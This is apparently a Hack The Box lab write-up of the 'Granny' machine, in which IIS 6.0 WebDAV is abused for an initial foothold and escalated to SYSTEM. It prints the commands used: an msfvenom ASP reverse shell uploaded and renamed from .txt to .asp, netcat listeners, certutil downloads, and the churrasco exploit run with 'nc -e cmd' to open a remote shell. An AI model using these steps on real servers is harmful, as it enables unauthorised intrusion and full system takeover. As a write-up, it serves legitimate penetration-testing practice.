Granny is a Windows 2003 box running IIS 6.0 and webdav. Webdav allowed anonymous uploads but required a bypass to upload an asp reverse shell. Once the shell was uploaded I got initial foothold by executing the uploaded file. I used an exploit called churrasco to call back to my machine with a shell as ‘nt authority\system’
- Microsoft(R) Windows(R) Server 2003, Standard Edition
- Front Page Version -
Port Scan
nmap -vv -Pn -sT -A -p- -oN /mnt/data/boxes/granny/_full_tcp_nmap.txt
- 80/tcp - http
davtest -url
Steps (user)
Browsing to showed the default “Under Contruction” page and no other useful information.
According to the nmap scan this server was running webdav so I ran a scan with davtest which tests uploading different executable file types. There were quite a few different files that could be uploaded and only html and txt could be executed.
I connected to the server using a webdav client called cadaver. After running the help command I learned that the command “MOVE” was available. Using MOVE I was able to get around the restrictons by uploading a file with a .txt extension and renaming it to asp.
I created an asp reverse shell with msfvenom and output it to rshell.txt and started a netcat listener (rlwrap nc -lvnp 4200).
msfvenom -p windows/shell_reverse_tcp lhost= lport=4200 -f asp > rshell.txt
I then connected to webdav via cadaver and uploaded rshell.txt
put rshell.txt
With the file uploaded, I used ‘move’ to rename the file from rshell.txt to rshell.asp
move rshell.txt rshell.asp
I browsed to and received a shell as ‘nt authority\network service’
Steps (root/system)
The systeminfo command showed that only one hotfix was installed. I used a tool called Windows Exploit Suggester to identify which exploits the box was vulnerable to. The tool requires the output of the systeminfo command which I pasted to a file called “sysinfo.txt”
Windows-Exploit-Suggester github repo.
./windows-exploit-suggester.py -l --database 2019-11-17-mssb.xls --systeminfo sysinfo.txt
After not having any much luck with the windows-exploit suggester results, I tried an exploit called churrasco.
Additional info about churrasco
First I downloaded the exploit from Re4son’s github repo
wget https://github.com/Re4son/Churrasco/raw/master/churrasco.exe
In prepration to use the exploit to create a reverse shell with netcat, I copied the nc.exe binary to my working directory.
cp ~/tools/windows-binaries/nc.exe .
I started a reverse listener (nc -lvnp 42301) and started a python http server
python3 -m http.server 80
I downloaded the netcat and the exploit to the local box
certutil -urlcache -split -f
certutil -urlcache -split -f
The exploit was run, specifying the netcat command with my box’s IP/port resulting in a shell as ‘nt authority\system’
churrasco.exe "nc -e cmd 4201"